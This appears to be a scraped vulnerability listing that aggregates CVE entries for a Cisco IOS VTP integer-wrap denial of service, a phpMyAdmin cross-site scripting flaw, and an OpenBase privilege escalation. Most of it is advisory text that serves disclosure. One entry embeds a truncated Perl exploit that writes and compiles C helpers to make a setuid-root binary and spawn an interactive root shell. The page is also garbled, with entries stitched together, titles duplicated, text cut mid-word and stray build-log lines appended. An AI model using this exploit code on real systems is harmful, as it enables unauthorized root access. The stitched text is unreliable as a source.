CVE-2006-4775: The VLAN Trunking Protocol (VTP) feature in Cisco IOS 12.1(19) and CatOS allows remote attackers to cause a denial of service by sending a VTP update with a…

CVE-2006-4775 [HIGH] GHSA-w58x-5ghh-784p: The VLAN Trunking Protocol (VTP) feature in Cisco IOS 12 The VLAN Trunking Protocol (VTP) feature in Cisco IOS 12.1(19) and CatOS allows remote attackers to cause a denial of service by sending a VTP update with a revision value of 0x7FFFFFFF, which is incremented to 0x80000000 and is interpreted as a negative number in a signed context.

CVE-2005-4826 [HIGH] GHSA-x2rx-8768-8678: Unspecified vulnerability in the VLAN Trunking Protocol (VTP) feature in Cisco IOS 12 Unspecified vulnerability in the VLAN Trunking Protocol (VTP) feature in Cisco IOS 12.1(22)EA3 on Catalyst 2950T switches allows remote attackers to cause a denial of service (device reboot) via a crafted Subset-Advert message packet, a different issue than CVE-2006-4774, CVE-2006-4775, and CVE-2006-4776.

CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.

CVE-2006-4775 [HIGH] CWE-399 Cisco IOS VTP Integer Wrap Denial of Service Vulnerability Cisco IOS VTP Integer Wrap Denial of Service Vulnerability Cisco IOS and Cisco Catalyst OS contain an integer overflow vulnerability that could allow an authenticated, remote attacker to cause affected devices to stop processing configuration changes, possibly resulting in a denial of service (DoS) condition. This vulnerability exists due to an integer overflow error within the statistics counters. An authenticated, remote attacker could exploit this vulnerability by sending a spoofed VTP summary packet to the affected device, causing the VTP statistics parameter to wrap to a negative number. This condition could prevent the affected device from processing further configuration changes. Under some circumstances, this could prevent the device from responding to further requests, resulting

CVE-2006-5852 Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation --- #!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # \n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{"$key"}); print "\t$key . $a - $b\n"; } print "\n"; exit 1; } $ret = pack("l", ($retval)); ($a,$b) = split(/\:/,$tgts{"$target"}); print "*** Target: $a - $b\n"; open(OP,">/tmp/finisterre.c"); printf OP "main()\n"; printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"chown root: /tmp/pwns ; chmod 4775 /tmp/pwns\"); }\n"; open(OP,">/tmp/pwns.c"); printf OP "main()\n"; printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n"; system("gcc -o /tmp/finisterre /tmp/finisterre.c"); sys

CVE-2008-4775 [MEDIUM] CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability: Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977. References: http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded http://www.securityfocus.com/bid/31928 http://secunia.com/advisories/32449 Discussion: 613 (phpMyAdmin): Build on target fedora-4-epel succeeded. 612 (phpMyAdmin): Build on target fedora-5-epel suc